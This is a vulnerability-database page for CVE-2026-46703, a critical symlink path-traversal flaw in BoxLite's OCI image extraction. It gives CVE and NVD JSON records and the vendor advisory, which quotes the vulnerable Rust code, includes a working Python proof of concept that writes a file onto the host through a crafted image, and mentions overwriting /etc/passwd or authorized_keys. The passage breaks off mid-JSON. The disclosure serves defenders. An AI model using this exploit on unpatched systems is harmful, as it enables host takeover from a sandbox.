Vulnerability-Lookup

CVE-2026-46703 (GCVE-0-2026-46703)

Vulnerability from cvelistv5 – Published: 2026-06-10 22:20 – Updated: 2026-06-11 13:46

Title

BoxLite: Path Traversal Vulnerability in boxlite Leads to Arbitrary File Write on the Host

Summary

Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. Prior to version 0.9.0, Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. This issue has been patched in version 0.9.0.

Severity

9.6 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/boxlite-ai/boxlite/security/ad…	x_refsource_CONFIRM
https://github.com/boxlite-ai/boxlite/releases/ta…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
boxlite-ai	boxlite	Affected: < 0.9.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-46703",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-11T13:44:33.205310Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-11T13:46:54.224Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "boxlite",
          "vendor": "boxlite-ai",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.9.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. Prior to version 0.9.0, Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. This issue has been patched in version 0.9.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-10T22:20:24.569Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j"
        },
        {
          "name": "https://github.com/boxlite-ai/boxlite/releases/tag/v0.9.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/boxlite-ai/boxlite/releases/tag/v0.9.0"
        }
      ],
      "source": {
        "advisory": "GHSA-f396-4rp4-7v2j",
        "discovery": "UNKNOWN"
      },
      "title": "BoxLite: Path Traversal Vulnerability in boxlite Leads to Arbitrary File Write on the Host"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-46703",
    "datePublished": "2026-06-10T22:20:24.569Z",
    "dateReserved": "2026-05-15T23:26:58.309Z",
    "dateUpdated": "2026-06-11T13:46:54.224Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-46703",
      "date": "2026-06-11",
      "epss": "0.00188",
      "percentile": "0.40515"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-46703\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-10T23:16:47.893\",\"lastModified\":\"2026-06-11T15:21:07.370\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. Prior to version 0.9.0, Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. This issue has been patched in version 0.9.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\",\"baseScore\":9.6,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/boxlite-ai/boxlite/releases/tag/v0.9.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"BoxLite: Path Traversal Vulnerability in boxlite Leads to Arbitrary File Write on the Host\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-22\", \"lang\": \"en\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"HIGH\", \"baseScore\": 9.6, \"baseSeverity\": \"CRITICAL\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"scope\": \"CHANGED\", \"userInteraction\": \"REQUIRED\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j\"}, {\"name\": \"https://github.com/boxlite-ai/boxlite/releases/tag/v0.9.0\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/boxlite-ai/boxlite/releases/tag/v0.9.0\"}], \"affected\": [{\"vendor\": \"boxlite-ai\", \"product\": \"boxlite\", \"versions\": [{\"version\": \"\u003c 0.9.0\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-10T22:20:24.569Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. Prior to version 0.9.0, Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. This issue has been patched in version 0.9.0.\"}], \"source\": {\"advisory\": \"GHSA-f396-4rp4-7v2j\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46703\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-11T13:44:33.205310Z\"}}}], \"references\": [{\"url\": \"https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-11T13:44:00.837Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-46703\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-05-15T23:26:58.309Z\", \"datePublished\": \"2026-06-10T22:20:24.569Z\", \"dateUpdated\": \"2026-06-11T13:46:54.224Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-46703

Vulnerability from fkie_nvd - Published: 2026-06-10 23:16 - Updated: 2026-06-11 15:21

Severity

9.6 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/boxlite-ai/boxlite/releases/tag/v0.9.0
	security-advisories@github.com	https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. Prior to version 0.9.0, Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. This issue has been patched in version 0.9.0."
    }
  ],
  "id": "CVE-2026-46703",
  "lastModified": "2026-06-11T15:21:07.370",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.6,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-06-10T23:16:47.893",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/boxlite-ai/boxlite/releases/tag/v0.9.0"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-F396-4RP4-7V2J

Vulnerability from github – Published: 2026-05-21 21:54 – Updated: 2026-06-11 14:07

Summary

Boxlite: Path Traversal Vulnerability Leads to Arbitrary File Write on the Host

Details

Summary

Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and run OCI containers within them. Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host.

Details

Entry Point — OCI Layer Tarball Extraction

File: boxlite/src/images/archive/tar.rs Function: extract_layer_tarball_streaming() (line 24) Code:

pub fn extract_layer_tarball_streaming(tarball_path: &Path, dest: &Path) -> BoxliteResult<u64> {
    // ...
    apply_oci_layer(reader, dest)
}

Issue: The function passes the tar reader into apply_oci_layer. The tarball comes from a registry blob that has passed SHA256 integrity verification against the manifest digest — but the manifest itself is controlled by the registry, so a malicious registry can serve a valid manifest pointing to a crafted layer blob with a matching digest.

Main Extraction Loop — Symlink Created Without Target Validation

File: boxlite/src/images/archive/tar.rs Function: apply_oci_layer() (line 196) Code:

EntryType::Symlink => {
    let target = link_name.ok_or_else(|| { /* ... */ })?;
    create_symlink(&full_path, &target)?;  // line 327 — target is NOT validated
}

Issue: The symlink's full_path (the link itself) is sanitized by normalize_entry_path to stay within dest. However, the target (what the symlink points to) is never validated. An entry with path usr and link target /etc creates {dest}/usr -> /etc, a symlink pointing outside the extraction root. There is no check that target stays within dest, is relative, or doesn't escape the container root.

Symlink Target Written Verbatim

File: boxlite/src/images/archive/tar.rs Function: create_symlink() (line 747) Code:

fn create_symlink(path: &Path, target: &Path) -> BoxliteResult<()> {
    std::os::unix::fs::symlink(target, path).map_err(|e| { /* ... */ })
}

Issue: std::os::unix::fs::symlink is an lstat-level operation — it creates the symlink with the provided target string verbatim, no matter what it contains. If target is /etc, the link records /etc as the target. No containment check.

ensure_parent_dirs Deliberately Follows and Preserves Escape Symlinks

File: boxlite/src/images/archive/tar.rs Function: ensure_parent_dirs() (line 457) Code:

Ok(m) if m.file_type().is_symlink() => {
    // Check if symlink points to a directory
    match fs::metadata(current_check) {  // follows symlink
        Ok(target_m) if target_m.is_dir() => {
            trace!("Preserving symlink that points to directory: ...");
            break;  // line 516 — stop, keep the symlink, treat as valid parent
        }

Issue: When the next tar entry has path usr/passwd and the code calls ensure_parent_dirs("{dest}/usr/passwd", dest), it walks up to {dest}/usr, finds it is a symlink pointing to a directory (e.g., /etc), and explicitly breaks the loop to preserve it — treating the out-of-root symlink as a valid, navigable parent. The create_dir_all call is then skipped for this path. The caller proceeds to open and write {dest}/usr/passwd, which the kernel resolves through the symlink to /etc/passwd.

File Written Through Escaped Symlink

File: boxlite/src/images/archive/tar.rs Function: create_regular_file() (line 715) Code:

fn create_regular_file<R: Read>(entry: &mut Entry<R>, path: &Path, mode: u32) -> BoxliteResult<()> {
    let mut file = OpenOptions::new()
        .write(true).create(true).truncate(true).mode(mode)
        .open(path)   // path = "{dest}/usr/passwd" which kernel follows to "/etc/passwd"
        .map_err(|e| { /* ... */ })?;
    io::copy(entry, &mut file)?;   // attacker-controlled content written to /etc/passwd
    Ok(())
}

Issue: OpenOptions::open() follows symlinks in path components by default. The kernel resolves {dest}/usr/passwd → {dest}/usr is a symlink to /etc → file opened at /etc/passwd. Attacker-controlled tar entry content is copied there verbatim.

As seen from the code, when a tar entry is a symlink, Boxlite's security checks are insufficient. An attacker can exploit this vulnerability to achieve arbitrary file write once a user loads a maliciously crafted image. The write permission is consistent with the process privilege running the Boxlite service, which is commonly root on Linux. The attacker can further leverage this capability to achieve remote code execution, such as writing the attacker's public key into the host's authorized_keys.

PoC

Install Boxlite following the official tutorial.
Run the following Python script:

```python #!/usr/bin/env python3 """ PoC: BoxLite OCI Layer Extraction Symlink Escape =================================================

Vulnerability: boxlite/src/images/archive/tar.rs — extract_layer_tarball_streaming() Type: CWE-61 / CAPEC-132 — Symlink Following during tar extraction

Attack: OCI images consist of layer tarballs extracted on the host to build the ext4 base image. If the extractor follows a symlink without verifying the resolved path stays within the extraction root, an attacker can craft a tar like:

   [1] SYMLINK  escape  ->  /tmp          (points to host /tmp)
   [2] FILE     escape/poc/pwned.txt       (resolves via [1] to /tmp/poc/pwned.txt)

 KVM hardware isolation is irrelevant here — tar extraction happens in the host
 process before the VM ever starts.

Target write: /tmp/boxlite_host_escape/pwned.txt Expected isolation boundary: boxlite internal staging dir under /tmp """

import asyncio import hashlib import io import json import os import shutil import tarfile import time

TARGET_FILE = "/tmp/boxlite_host_escape/pwned.txt" OCI_LAYOUT_DIR = "/tmp/malicious_oci_layout"

# ── Helpers ───────────────────────────────────────────────────────────────────

def sha256hex(data: bytes) -> str: return hashlib.sha256(data).hexdigest()

def add_entry( tf: tarfile.TarFile, name: str, type_: bytes, linkname: str = "", data: bytes = b"", mode: int = 0o644, ): info = tarfile.TarInfo(name=name) info.type = type_ info.linkname = linkname info.size = len(data) info.mode = mode info.mtime = int(time.time()) tf.addfile(info, io.BytesIO(data) if data else None)

# ── Step 1: Build malicious OCI layer tar ─────────────────────────────────────

def build_layer_tar() -> bytes: """ Tar entries (order matters): [1] SYMLINK escape -> /tmp [2] DIR escape/boxlite_host_escape/ (resolves to /tmp/boxlite_host_escape/) [3] FILE escape/boxlite_host_escape/pwned.txt (resolves to /tmp/…/pwned.txt) [4] FILE etc/os-release (legitimate-looking decoy entries) """ payload = ( "===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE =====\n" f"Written at: {time.strftime('%Y-%m-%d %H:%M:%S')}\n" f"Target: {TARGET_FILE}\n" "========================================================\n" ).encode()

   buf = io.BytesIO()
   with tarfile.open(fileobj=buf, mode="w") as tf:
       add_entry(tf, "escape", tarfile.SYMTYPE, linkname="/tmp", mode=0o777)
       add_entry(tf, "escape/boxlite_host_escape", tarfile.DIRTYPE, mode=0o755)
       add_entry(
           tf, "escape/boxlite_host_escape/pwned.txt", tarfile.REGTYPE, data=payload
       )
       add_entry(
           tf,
           "etc/os-release",
           tarfile.REGTYPE,
           data=b"ID=alpine\nVERSION_ID=3.19.0\n",
       )
   return buf.getvalue()

# ── Step 2: Build OCI image layout ───────────────────────────────────────────

def build_oci_layout(out_dir: str) -> None: blobs = os.path.join(out_dir, "blobs", "sha256") os.makedirs(blobs, exist_ok=True)

   def write_blob(data: bytes) -> tuple[str, int]:
       dgst = sha256hex(data)
       with open(os.path.join(blobs, dgst), "wb") as f:
           f.write(data)
       return dgst, len(data)

   layer_bytes = build_layer_tar()
   layer_dgst, layer_sz = write_blob(layer_bytes)

   config_bytes = json.dumps(
       {
           "architecture": "amd64",
           "os": "linux",
           "config": {"Cmd": ["/bin/sh"]},
           "rootfs": {"type": "layers", "diff_ids": [f"sha256:{layer_dgst}"]},
       }
   ).encode()
   cfg_dgst, cfg_sz = write_blob(config_bytes)

   manifest_bytes = json.dumps(
       {
           "schemaVersion": 2,
           "mediaType": "application/vnd.oci.image.manifest.v1+json",
           "config": {
               "mediaType": "application/vnd.oci.image.config.v1+json",
               "digest": f"sha256:{cfg_dgst}",
               "size": cfg_sz,
           },
           "layers": [
               {
                   "mediaType": "application/vnd.oci.image.layer.v1.tar",
                   "digest": f"sha256:{layer_dgst}",
                   "size": layer_sz,
               }
           ],
       }
   ).encode()
   mf_dgst, mf_sz = write_blob(manifest_bytes)

   with open(os.path.join(out_dir, "index.json"), "w") as f:
       json.dump(
           {
               "schemaVersion": 2,
               "manifests": [
                   {
                       "mediaType": "application/vnd.oci.image.manifest.v1+json",
                       "digest": f"sha256:{mf_dgst}",
                       "size": mf_sz,
                       "annotations": {"org.opencontainers.image.ref.name": "latest"},
                   }
               ],
           },
           f,
       )

   with open(os.path.join(out_dir, "oci-layout"), "w") as f:
       json.dump({"imageLayoutVersion": "1.0.0"}, f)

   print(f"  layer    sha256:{layer_dgst[:16]}…  ({layer_sz} B)")
   print(f"  config   sha256:{cfg_dgst[:16]}…  ({cfg_sz} B)")
   print(f"  manifest sha256:{mf_dgst[:16]}…  ({mf_sz} B)")

# ── Main ──────────────────────────────────────────────────────────────────────

async def main(): print("=" * 60) print(" PoC: BoxLite OCI Layer Extraction Symlink Escape") print("=" * 60)

   # Clean up previous run artifacts
   for path in [TARGET_FILE, "/tmp/boxlite_host_escape", OCI_LAYOUT_DIR]:
       if os.path.isfile(path):
           os.remove(path)
       elif os.path.isdir(path):
           shutil.rmtree(path)

   # [1] Build malicious OCI image
   print(f"\n[1] Building malicious OCI image → {OCI_LAYOUT_DIR}")
   build_oci_layout(OCI_LAYOUT_DIR)

   # [2] Show crafted tar entries
   print("\n[2] Malicious layer tar entries:")
   with open(os.path.join(OCI_LAYOUT_DIR, "index.json")) as f:
       idx = json.load(f)
   mf_dgst = idx["manifests"][0]["digest"].split(":")[1]
   with open(os.path.join(OCI_LAYOUT_DIR, "blobs", "sha256", mf_dgst)) as f:
       mf = json.load(f)
   lyr_dgst = mf["layers"][0]["digest"].split(":")[1]
   lyr_data = open(
       os.path.join(OCI_LAYOUT_DIR, "blobs", "sha256", lyr_dgst), "rb"
   ).read()
   with tarfile.open(fileobj=io.BytesIO(lyr_data)) as tf:
       for m in tf.getmembers():
           tstr = {
               tarfile.REGTYPE: "FILE   ",
               tarfile.SYMTYPE: "SYMLINK",
               tarfile.DIRTYPE: "DIR    ",
           }.get(m.type, f"?{m.type}   ")
           suffix = f" -> {m.linkname}" if m.issym() else ""
           print(f"    {tstr}  {m.name}{suffix}")

   # [3] Confirm target absent before exploit
   print(f"\n[3] Pre-exploit — target exists? {os.path.exists(TARGET_FILE)}")

   # [4] Trigger extraction (vulnerability fires before VM starts)
   print(f"\n[4] Loading malicious image via boxlite.SimpleBox(rootfs_path=…)")
   import boxlite

   try:
       async with boxlite.SimpleBox(rootfs_path=OCI_LAYOUT_DIR) as box:
           r = await box.exec("sh", "-c", "echo ok")
           print(f"    VM stdout: {r.stdout.strip()}")
   except Exception as e:
       # Box may fail to start (incomplete rootfs) — that's fine;
       # the symlink escape occurs during layer extraction, before VM launch.
       print(f"    Box error (expected): {type(e).__name__}: {e}")

   # [5] Verify host write
   print(f"\n[5] Post-exploit — target exists? {os.path.exists(TARGET_FILE)}")
   if os.path.exists(TARGET_FILE):
       print(f"\n  VULNERABLE — host file written successfully!")
       print(f"  Path: {TARGET_FILE}")
       print(open(TARGET_FILE).read())
   else:
       print("\n  NOT VULNERABLE (or already patched)")

if name == "main": asyncio.run(main()) ```

This script constructs a malicious OCI image and passes it to the SimpleBox function via rootfs_path to create a container. In the malicious image, a symlink is first created pointing escape to /tmp, and then files are written under escape, thereby achieving file writes to the root filesystem.

Sample output:

``` $ python3 poc_symlink_escape.py ============================================================ PoC: BoxLite OCI Layer Extraction Symlink Escape ============================================================

[1] Building malicious OCI image → /tmp/malicious_oci_layout layer sha256:a1e8b4de11d64fce… (10240 B) config sha256:8e245c2c65565998… (191 B) manifest sha256:2dad6671e78d8093… (415 B)

[2] Malicious layer tar entries: SYMLINK escape -> /tmp DIR escape/boxlite_host_escape FILE escape/boxlite_host_escape/pwned.txt FILE etc/os-release

[3] Pre-exploit — target exists? False

[4] Loading malicious image via boxlite.SimpleBox(rootfs_path=…) Box error (expected): RuntimeError: internal error: Container init failed: Failed to start container: internal error: Failed to create container b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54 at bundle /run/boxlite/containers/b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54: failed to create container: exec process failed with error error in executing process : PATH environment variable is not set

[5] Post-exploit — target exists? True

 VULNERABLE — host file written successfully!
 Path: /tmp/boxlite_host_escape/pwned.txt

===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE ===== Written at: ... Target: /tmp/boxlite_host_escape/pwned.txt ======================================================== ```

Impact

An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host.

Score

Severity: Critical, Score: 9.7, rationale as follows:

AV:N — The attacker can distribute the malicious image over the network, tricking users into pulling and using it
AC:L — This is a logic vulnerability that requires no complex exploitation
PR:N — The attacker does not need any additional privileges to exploit this vulnerability
UI:R — The attacker needs to trick the victim into using the maliciously crafted image
S:C — The attacker can leverage the vulnerability to achieve arbitrary command execution on the host, extending the impact to the host operating system and crossing the security boundary
C:H/I:H/A:H — The attacker can leverage the vulnerability to gain RCE capability on the host, posing a significant threat to confidentiality, integrity, and availability

Credit

This vulnerability was discovered by:

XlabAI Team of Tencent Xuanwu Lab
Atuin Automated Vulnerability Discovery Engine

If there are any questions regarding the vulnerability details, please feel free to reach out to BoxLite for further discussion by emailing xlabai@tencent.com.

Note

Note that Boxlite follows the industry-standard 90+30 disclosure policy (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that BoxLite reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented.

Severity

9.6 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "boxlite-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@boxlite-ai/boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/boxlite-ai/boxlite/sdks/go"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46703"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T21:54:15Z",
    "nvd_published_at": "2026-06-10T23:16:47Z",
    "severity": "CRITICAL"
  },
  "details": "#### Summary\n\nBoxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and run OCI containers within them. Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host.\n\n\n\n#### Details\n\n1. Entry Point \u2014 OCI Layer Tarball Extraction\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `extract_layer_tarball_streaming()` (line 24) **Code:**\n\n```rust\npub fn extract_layer_tarball_streaming(tarball_path: \u0026Path, dest: \u0026Path) -\u003e BoxliteResult\u003cu64\u003e {\n    // ...\n    apply_oci_layer(reader, dest)\n}\n```\n\n**Issue:** The function passes the tar reader into `apply_oci_layer`. The tarball comes from a registry blob that has passed SHA256 integrity verification against the manifest digest \u2014 but the manifest itself is controlled by the registry, so a malicious registry can serve a valid manifest pointing to a crafted layer blob with a matching digest.\n\n2. Main Extraction Loop \u2014 Symlink Created Without Target Validation\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `apply_oci_layer()` (line 196) **Code:**\n\n```rust\nEntryType::Symlink =\u003e {\n    let target = link_name.ok_or_else(|| { /* ... */ })?;\n    create_symlink(\u0026full_path, 